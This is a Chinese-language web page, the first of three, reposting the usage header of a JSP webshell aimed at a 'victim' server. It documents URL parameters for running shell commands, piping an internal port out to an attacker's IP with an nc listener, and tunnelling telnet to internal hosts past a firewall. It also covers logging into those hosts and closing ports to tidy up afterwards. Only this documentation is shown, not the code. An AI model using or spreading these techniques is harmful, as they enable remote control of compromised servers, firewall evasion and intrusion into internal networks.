JSPWEBSHELL

来源:网络收集 作者:admin 阅读: 字体:[ ] [打印] [关闭]
自定义标签 wzsp 未创建

内容提要:* WEBSHELL.JSP * 使用方法: * http://victim/webshell.jsp?[options ] * options: * action=piped=remoteHost==remotePort==myIp==myPort= * action=tunnel=remoteHost==remotePort==myPort= * action=login=userna ……

* WEBSHELL.JSP  
* 使用方法:
* http://victim/webshell.jsp?[options]  
* options:  
* action=piped=remoteHost==remotePort==myIp==myPort=  
* action=tunnel=remoteHost==remotePort==myPort=  
* action=login=username==password==myPort=  
* action=send=myShell==myPort==cmd=  
* action=close=myPort=  
* action=shell=cmd=  
* 例子:  
* action=piped=remoteHost=192.168.0.1=remotePort=25=myIp=218.0.0.1=myPort=12345 -- 将192.168.0.1的25端口与218.0.0.1的12345端口连接起来(可以先用NC监听12345端口)。适用于你无法直接访问已控制的WEB服务器的内网里某机器的某端口,而防火墙又未过滤该WEB服务器向外的连接。  

* action=tunnel=remoteHost=192.168.0.1=remotePort=23=myPort=65534 -- 实现通过访问该webshell.jsp访问内网某主机telnet服务的功能。(原本想实现通过访问webshell.jsp实现对内网任意服务访问的功能,但jsp功能有限实现起来较为复杂),适用于你控制的机器只开了80端口,并且防火墙不允许它访问Internet,而你又非常想访问它内网某主机的Telnet服务:-)  
* action=login=username=root=password=helloroot=myPort=65534 -- 上一步只是告诉了要Telnet那台机器,这一步才开始真正登陆,你要输入要telnet主机的正确的用户名密码才行喔,要不然谁也没办法。  
* action=send=myShell==myPort==cmd= -- 上一步如果顺利完成,那么你就可以在上边执行你想执行的命令了。myShell这个参数是结束标记,否则无法知道数据流什么时间该结束(一定要写对喔,否则嘿嘿,就麻烦罗)。cmd这个参数就是你要执行的命令了,比如:“which ssh”,建议你这样玩:myShell=lovehacker=cmd=ls -la;echo lovehacker。  

* action=close=myPort= -- 你是退出了telnet登陆,但程序在主机上开放的端口还没关闭,所以你要再执行这个命令,现场打扫干净嘛。  

* action=shell=cmd= -- 在你控制的这台机器上执行命令。Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:\winnt\win.ini  

* 程序说明:  

* 想通过jsp实现telnet代理的时候着实头痛了一把,每个请求都是一个新的线程,client socket去连接  

* telnet服务只能批量命令,无法实现与用户的交互,后来想了个笨办法:把telnet的过程分步完成,接  

* 收到tunnel命令后,先起两个线程,一个监听端口等待连接,一个先和远程服务器建立好端口连接并一  

* 直不断开,这下server socket再一次一次的收数据,一次次的转发到远程服务器,就可以记录状态,实  

* 现和用户的交互了,但总觉得这办法太笨,如果用JSP实现telnet代理功能,你有更好的办法的话请一定  

* 要来信告诉我。  

* 版权说明:  

* 本身实现Telnet的功能我也是在人家代码的基础上修改的,所以:版权没有,你可以任意修改、复制。  

* 只是加了新功能别忘了Mail一份给我喔! &nbs

123下一页
[标签: JSPWEBSHELL] [打印] [关闭]
站长评论(0) 查看所有评论
相关新闻

热门新闻

推荐新闻